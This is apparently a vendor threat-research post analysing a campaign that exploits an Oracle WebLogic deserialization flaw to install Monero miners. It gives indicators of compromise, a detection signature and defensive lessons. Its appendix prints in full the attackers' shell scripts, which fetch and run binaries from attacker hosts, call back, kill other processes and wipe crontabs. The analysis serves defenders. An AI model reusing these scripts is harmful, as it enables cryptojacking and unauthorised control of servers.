Justin WarnerWith the recent surge in popularity and increasing value of cryptocurrency, it should be no surprise that financially motivated threat actors have begun leveraging their victims to contribute to “mining” efforts, where the computing resources of the victim are used to generate cryptocurrency for the threat actor. To succeed in making a large profit, the actors must continually compromise a large number of victims and utilize significant computing resources. This demand for mass compromise has forced these threat actors to adopt automated methods that rely on opportunistic exploitation to outpace defenders, increasing the number of victims as quickly as possible with minimal cost.
While on the surface, the business impact from coin mining seems minimal, having an unauthorized party in control of systems you own introduces a dangerous wild card. Is it really a criminal performing coin mining or is that a disguise? What will they do with the access if coin mining is no longer profitable? The Gigamon Applied Threat Research (ATR) team has witnessed incidents stemming from criminals who decided to sell their access to other parties, and the increasingly common malware-as-a-service scheme contributes to the risk from “simple” coin mining. Simply stated, criminal post-exploitation has become an efficient and wide-spread business that poses a threat to all enterprises, especially those with a significant and historical internet footprint that may contain undocumented or obsolete systems and pages. In this post, we will provide a walkthrough of an attack campaign that the Gigamon ATR team has witnessed in the wild over the past several weeks and break down some key lessons learned from the attack.
Attack Walkthrough
Exploitation
Attackers primarily rely on opportunistic exploitation of well known (and signatured) vulnerabilities in applications running on internet connected systems, and exhibit complete disregard for stealth or disguise. Throughout the recently observed campaign, attackers originating from multiple source addresses (191.101.180[.]84, 72.11.140[.]178) leveraged CVE-2017-10271, a java deserialization vulnerability in the Oracle WebLogic Server, to target outdated servers (Figure 1). Java deserialization vulnerabilities are not unique to Oracle, and plague several older versions of WebSphere, JBoss, Jenkins, OpenNMS, etc. In this class of vulnerability, server software attempts to deserialize untrusted content without validation allowing an attacker to abuse the application for code execution.
Tool Staging
Following exploitation of the system, the threat actor downloads and executes a shell script from their command and control (C2) server using Wget. Throughout the campaign, we observed several variations of the same tool (Table 1), each progressively adding capabilities or cleanup mechanisms. This indicates the possibility that the tool is either a public script that is getting reused and built upon, or that this campaign is more far-reaching than the Gigamon ATR team has independently observed to this point.
| Identifier | Hosted URL | SHA1 Hash |
|---|---|---|
| Version A | http://72.11.140[.]178/setup-watch | df62241026a96cda6057d894000de8ed70b3b666 |
| Version B | http://191.101.180[.]84:80/robots.txt | 4c3f1cc052f7216447df8954a55e373bdf2ecefc |
In Version B, the Gigamon ATR team has observed, the script performs two major actions: cleanup and staging of tools. During the cleanup routine, the script performs extensive attempts to prevent multiplicative effects, killing active processes of previously running code, other coin miners on the system, or system utilities that might be used to detect the action. During the staging phase, the script runs two similar routines to download two different files from different URIs, provide executable permissions, and attempt execution of these files. Both files are downloaded to the path ‘/tmp/xfsallocd’. The script sends a follow-on signal to the controller via an HTTP request from the download utility to a specific URI to indicate whether the file was already running or successfully started. Figure 2 shows the complete network staging process without the signal for successful execution. For a complete review of the source code, please reference Appendix B.
Profit
The executable binaries that are downloaded during staging are publicly known and identified Monero Coin Miners (Table 2). Analysis of the binaries show they are using the standard stratum connection string “stratum+tcp://pool.minexmr.com:80” with a wallet ID of:
“4AQe5sAFWZKECiaeNTt59
LG7kVtqRoSRJMjrmQ6GiMF
AeUvoL3MFeTE6zwwHkFPrA
yNw2JHDxUSWL82RiZThPpk
4SEg7Vqe”.
Analysis of the wallet associated with this activity shows that the threat actor/s have been paid out a total of 603.535663865 XMR, which, at the current exchange rate, equates to approximately $260,000 (note that, with cryptocurrency price fluctuations, this number is purely a point in time estimate).
| Download URI | Local File Name | SHA Hash |
|---|---|---|
| $HOST/files/l/default | /tmp/xfsallocd, /tmp/watch-smartd | f79a2ba735a988fa 6f65988e1f3d396 84727bdc4 |
| $HOST/files/l/others | /tmp/xfsallocd, /tmp/watch-smartd | 7c57c61664f2b23 73f755f22db9c15 6a1ca80849 |
It is also worth noting that as of Jan 4, 2017, AlienVault published a signature to the public Emerging Threats feed (Figure 3) to identify activity with the associated wallet ID for this threat actor.
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS CoinMiner? Malicious Authline Seen After CVE-2017-10271
Exploit"; flow:established,to_server; content:"{|22|id|22 3A|"; depth:6; content:"|22|method|22 3a 20 22|mining.authorize|22
2c|"; within:100; content:"|22|params|22|"; within:50; content:"|5b 22|4AQe5sAFWZKECiaeNTt59LG7kVtqRoSRJMjrmQ6GiMFAeUvoL3MFeT
E6zwwHkFPrAyNw2JHDxUSWL82RiZThPpk4SEg7Vqe|22 2c 20 22|"; distance:0; metadata: former_category CURRENT_EVENTS;
reference:url,otx.alienvault.com/pulse/5a4e1c4993199b299f90a212; classtype:trojan-activity; sid:2025186; rev:1;
metadata:attack_target Web_Server, deployment Datacenter, signature_severity Major, created_at 2018_01_04,
malware_family CoinMiner?, performance_impact Low, updated_at 2018_01_04;)Figure 3: Emerging Threats Signature ID 2025186.
Analysis
As part of our investigations, the Gigamon ATR team’s analysts were able to identify additional related activity across our customer space and in the public domain. The primary points of pivot were signatures developed to match the Linux scripts, infrastructure analysis, open source intelligence gathering, and the wallet ID tied to the threat actor observed in the aforementioned campaign. By pivoting on these indicators, the Gigamon ATR team discovered the following:
- Fourteen additional Linux shell script variants that had variations of the downloader string, host IP address, and coin miner file paths
- Three variants of Windows PowerShell scripts that mirror the functionality of the observed Linux scripts
- Two additional servers performing exploitation activity
- Thirteen Windows XMRig coin miner variants customized for this campaign
All indicators discovered during this activity are provided and identified in Appendix A.
Lessons Learned
It is easy to look at this relatively simple activity and make a judgement of the attackers tradecraft—almost too simple for an enterprise to be susceptible to this type of activity. However, criminals are able to compromise a large number of victims and profit from the activity. The above reillustrates that:
- Visibility and knowledge of your internet footprint is vital
- Multi-layered detection strategies provide a robust means to discover malicious activity
- Forensics and root cause analysis are critical for long term continuity of business operations during incidents
Visibility and Knowledge of Your Internet Footprint Is Vital
If the successful exploitation of outdated and exposed assets provides the threat actor a form of revenue, it is likely they will continue to use these techniques. Knowledge of your asset inventory, application versioning, and attack surface will help you to better prevent, detect, and respond. In the case of many outdated or legacy *nix-based systems, it is unlikely that any sort of endpoint detection or response software will be supported, increasing the need for widespread network visibility and accountability over these endpoints.
Multi-Layered Detection Strategies Provide a Robust Means to Discover Malicious Activity
Simply alerting on the IOCs provided in this post will serve as an initial layer of detection, but organizations should strive for more reliable indicators of malicious activity. In the case of this specific incident, there are numerous key detection points. Examples of these include:
- Atomic Indicators: Threat intelligence matching on the servers, threat intel matching on the downloaded binaries, coin mining network activity, etc.
- Complex Indicators: Executables downloaded with a suspicious user-agent, interaction with internet exposed systems from “newly observed” low-reputation entities, executables download immediately following an exploit attempt, etc.
Forensics and Root Cause Analysis Are Critical for Long Term Continuity of Business Operations During Incidents
Even if successfully detected, a failure to contain or remediate the activity will likely lead to continued exploitation. In the case of interactive threat actors, an incomplete remediation will also provide a significant tip-off of your knowledge of their presence. Consider the scenario where you detect the activity, perform forensics to validate that no additional exploitation has occurred, and move to reimage the system for business continuity. Proper removal can be a time consuming and intricate process that may be best handled by bringing in an Incident Response team to ensure complete remediation.
Gigamon Insight is a network security analytics solution that offers a SaaS capability that enables customers to gain and utilize widespread network visibility for security operations. As part of its research, the Gigamon ATR team coordinates disclosure of security threats and vulnerabilities with relevant parties in order to maximize both the response and victim remediation efforts as well as working to truly improve the security of customers and other victims prior to publishing blog posts.
Attachment A: Indicators of Compromise
| Indicator | Type | Description |
|---|---|---|
| 72.11.140[.]178 | IP Address | Server for exploitation and tool staging observed by ICEBRG |
| 72.11.140[.]179 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
| 72.11.140[.]180 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
| 191.101.180[.]84 | IP Address | Server for exploitation and tool staging identified via secondary analysis |
| /files/l/default | URI | URI of “default” coin mining malware |
| /files/l/others | URI | URI of “others” coin mining malware |
| carbon | Filename | Name of downloaded file, typically in /tmp or working dir |
| infoed | Filename | Name of downloaded file, typically in /tmp or working dir |
| ksxworker | Filename | Name of downloaded file, typically in /tmp or working dir |
| rcp_bh | Filename | Name of downloaded file, typically in /tmp or working dir |
| watch_smartd | Filename | Name of downloaded file, typically in /tmp or working dir |
| xfsallocd | Filename | Name of downloaded file, typically in /tmp or working dir |
| xlog-daemon | Filename | Name of downloaded file, typically in /tmp or working dir |
| 9c2d266e880848a3f08dcceee0d27a660c521ac5 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| abc8be4e557107e80c1c342b7505dd3d2e47ef7f | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| e843c894d837a41f5f9f2bcf932d1c5e49afe08b | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 07133903f1c38e653e39f9877dca9575699e807d | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 68039309925c8804fa745173cc8805938f3e3184 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 25c804e082a4adc01bfcbc19704f541c7026fa9b | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 0b4f904cebd469abff43f0457ab6a77466453173 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| c0b76bca13da6989f05c4aeac59029c3987d7f98 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 3909125fd2ddca0aff8130115ef8b870e508e795 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 348d1b3a54dc89250531258fe822e3a948dbc071 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| b4771410fe5bf3825df41735820aeaeff3c685bb | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 13736cfc4df64a9890c4474f0003a54a8b72ffe2 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| 5249dadfea25acaeb66a0f1798ac2f09a41f2449 | SHA1 Hash | Hash of script delivered via exploit identified via secondary analysis |
| df62241026a96cda6057d894000de8ed70b3b666 | SHA1 Hash | Hash of script delivered via exploit observed by ICEBRG |
| 4c3f1cc052f7216447df8954a55e373bdf2ecefc | SHA1 Hash | Hash of script delivered via exploit observed by ICEBRG |
| f79a2ba735a988fa6f65988e1f3d39684727bdc4 | SHA1 Hash | Hash of downloaded coinminer tool “default” observed by ICEBRG |
| 7c57c61664f2b2373f755f22db9c156a1ca80849 | SHA1 Hash | Hash of downloaded coinminer tool “other” observed by ICEBRG |
| 73f9eff7c66df6e5d3c7ff113e9c8bbc7436d47c | SHA1 Hash | Hash of PowerShell variant A identified via secondary analysis |
| 3b348578d15080856b869937240899a71bc4f0da | SHA1 Hash | Hash of PowerShell variant B identified via secondary analysis |
| 8a8a606f7b2c5efca11c7a7d3d692d5c36a19a7b | SHA1 Hash | Hash of PowerShell variant C identified via secondary analysis |
| d0cee3f54e6768520d5b96337fcfe6e217567ed7 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 176d27189aa72330ef2676c8fbee939c6a0ddea2 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| auto-upgrade.exe | Filename | Windows filename for XMRig. Stored in path ‘$env:TMP’ |
| /files/w/default | URI | URI of hosted “default” XMRig binary for Windows |
| /files/w/others | URI | URI of hosted “other” XMRig binary for Windows |
| 2384c36517e300628a040393b05a546ede2808e0 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 176d27189aa72330ef2676c8fbee939c6a0ddea2 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 43a2535e11d8ba03f6347e324bee93125c7d6cf6 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| bc30a4d02155a65cc79697b6e1a5d224e59bbfc7 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 7495514ddc01d262c46b0886a7ce9d9eca334b33 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| d0cee3f54e6768520d5b96337fcfe6e217567ed7 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 7ca8f4b97693d5612106b270bffc86c0ecc21649 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 9534f9e94a2b6b7752685a7634d3f904b5fbb3ae | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 05ee995cf49feee849a356fcd93c37260fa44fa2 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| df8aa574bf020e289707e4dc78d9ca053bfafe67 | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| ab5ef923bc35cac25374716468c3b739cd688b9a | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| de136240b00ed289c29dbde7fcf99313acad458f | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
| 2e4a31a68fd27f9435c326988e614b46e196a32d | SHA1 Hash | XMRig CPU Miner (Windows) identified via secondary analysis |
Differential Analysis of Linux Shell Scripts
| SHA1 Hash | Downloader | Host | Local File |
|---|---|---|---|
| 9c2d266e880848a3f08dcceee0d27a660c521ac5 | curl | 72.11.140[.]178 | /tmp/rcp_bh |
| ca9fad2fe12b5231ae42f507afbb00a742b2e3d2 | wget -q -O – | 72.11.140[.]178 | /tmp/infoed |
| abc8be4e557107e80c1c342b7505dd3d2e47ef7f | wget -q -O – | 191.101.180[.]84 | `pwd`/xfsallocd /tmp/xfsallocd |
| e843c894d837a41f5f9f2bcf932d1c5e49afe08b | wget -q -O – | 191.101.180[.]84 | `pwd`/xfsallocd /tmp/xfsallocd |
| 07133903f1c38e653e39f9877dca9575699e807d | wget -q -O – | 72.11.140[.]178 | /tmp/carbon |
| 68039309925c8804fa745173cc8805938f3e3184 | curl | 72.11.140[.]178 | /tmp/infoed |
| 25c804e082a4adc01bfcbc19704f541c7026fa9b | wget -q -O – | 72.11.140[.]180 | `pwd`/xlog-daemon |
| 0b4f904cebd469abff43f0457ab6a77466453173 | wget -q -O – | 72.11.140[.]178 | /tmp/rcp_bh |
| c0b76bca13da6989f05c4aeac59029c3987d7f98 | wget -q -O – | 191.101.180[.]84 | `pwd`/xfsallocd /tmp/xfsallocd |
| 3909125fd2ddca0aff8130115ef8b870e508e795 | curl | 191.101.180[.]84 | /tmp/xfsallocd |
| 348d1b3a54dc89250531258fe822e3a948dbc071 | wget -q -O – | 72.11.140[.]178 | `pwd`/rcp_bh |
| b4771410fe5bf3825df41735820aeaeff3c685bb | curl | 72.11.140[.]178 | /tmp/infoed |
| 13736cfc4df64a9890c4474f0003a54a8b72ffe2 | curl | 72.11.140[.]178 | `pwd`/rcp_bh |
| 5249dadfea25acaeb66a0f1798ac2f09a41f2449 | wget -q -O – | 72.11.140[.]179 | /tmp/ksxworker |
| df62241026a96cda6057d894000de8ed70b3b666 | wget -q -O – | 72.11.140[.]178 | /tmp/watch-smartd |
| 4c3f1cc052f7216447df8954a55e373bdf2ecefc | wget -q -O – | 191.101.180[.]84 | /tmp/xfsallocd |
Attachment B: Script Source Code
Version A
HOST=72.11.140.178
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
LFILE_NAME="watch-smartd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT ()
{
$DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
else
$DOWNLOADER "${CALLBACK}/?info=l69"
fi
}
OTHERS ()
{
$DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
else
$DOWNLOADER "${CALLBACK}/?info=l39"
fi
}
DEFAULT || OTHERSVersion B
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
HOST=191.101.180.84
CALLBACK=$HOST
# DOWNLOADER="curl "
DOWNLOADER="wget -q -O - "
LFILE_NAME="xfsallocd"
# LFILE_PATH=`pwd`/$LFILE_NAME
LFILE_PATH=/tmp/$LFILE_NAME
DEFAULT_RFILE=$HOST/files/l/default
OTHERS_RFILE=$HOST/files/l/others
CLEAN ()
{
RMLIST=(/tmp/*index_bak* /tmp/*httpd.conf* /tmp/*httpd.conf /tmp/a7b104c270 /tmp/Carbon)
KILIST=(sb1 wipefs AnXqV.yam [email protected] monerohash.com /tmp/a7b104c270 stratum.f2pool.com:8888 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8 46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe xmrpool.eu mine.moneropool.com xmr.crypto-pool.fr:8080 xmr.crypto-pool.fr:3333 xmr.crypto-pool.fr:6666 xmr.crypto-pool.fr:7777 xmr.crypto-pool.fr:443)
for item in ${RMLIST[@]}
do
rm -rf $item
done
for item in ${KILIST[@]}
do
ps auxf|grep -v grep|grep $item|awk '{print $2}'|xargs kill -9
done
days=$(($(date +%s) / 60 / 60 / 24))
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep ${days}|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "logind.conf"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "kworker"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "Silence"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "45hsTaSqTQM4K1Xeqkcy7eLzqdEuQ594fJVmQryCemQSCU878JGQdSDCxbhNyVjSkiaYat8yAfBuRTPSEUPZoARm9a5XEHZ"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44iuYecTjbVZ1QNwjWfJSZFCKMdceTEP5BBNp4qP35c53Uohu1G7tDmShX1TSmgeJr2e9mCw2q1oHHTC2boHfjkJMzdxumM"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "t.sh"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "wipefs"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "carbon"|awk '{print $2}'|xargs kill -9
pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
pkill -f cpuloadtest
pkill -f crypto-pool
pkill -f xmr
pkill -f prohash
pkill -f monero
pkill -f miner
pkill -f nanopool
pkill -f minergate
pkill -f yam
pkill -f Silence
pkill -f yam2
pkill -f minerd
pkill -f Circle_MI.png
pkill -f curl
ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "44pgg5mYVH6Gnc7gKfWGPR2CxfQLhwdrCPJGzLonwrSt5CKSeEy6izyjEnRn114HTU7AWFTp1SMZ6eqQfvrdeGWzUdrADDu"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "11231"|awk '{print $2}'|xargs kill -9
}
DEFAULT ()
{
$DOWNLOADER $DEFAULT_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l60"
else
$DOWNLOADER "${CALLBACK}/?info=l69"
fi
}
OTHERS ()
{
$DOWNLOADER $OTHERS_RFILE > $LFILE_PATH
chmod +x $LFILE_PATH
ps -ef|grep $LFILE_NAME|grep -v grep
if [ $? -ne 0 ]; then
$LFILE_PATH -B && $DOWNLOADER "${CALLBACK}/?info=l30"
else
$DOWNLOADER "${CALLBACK}/?info=l39"
fi
}
CLEAN
DEFAULT || OTHERS
crontab -r